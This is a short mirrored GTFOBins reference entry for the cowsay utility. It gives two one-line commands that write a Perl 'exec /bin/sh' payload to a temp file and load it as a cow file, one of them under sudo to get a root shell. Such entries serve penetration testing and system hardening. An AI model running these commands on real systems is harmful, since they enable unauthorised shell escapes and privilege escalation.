1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/cowsay.md
2020-11-12 01:02:28 +01:00

323 B

description functions
It allows to execute [`perl`](/gtfobins/perl) code, other functions may apply.
shell sudo
code
TF=$(mktemp) echo 'exec "/bin/sh";' >$TF cowsay -f $TF x
code
TF=$(mktemp) echo 'exec "/bin/sh";' >$TF sudo cowsay -f $TF x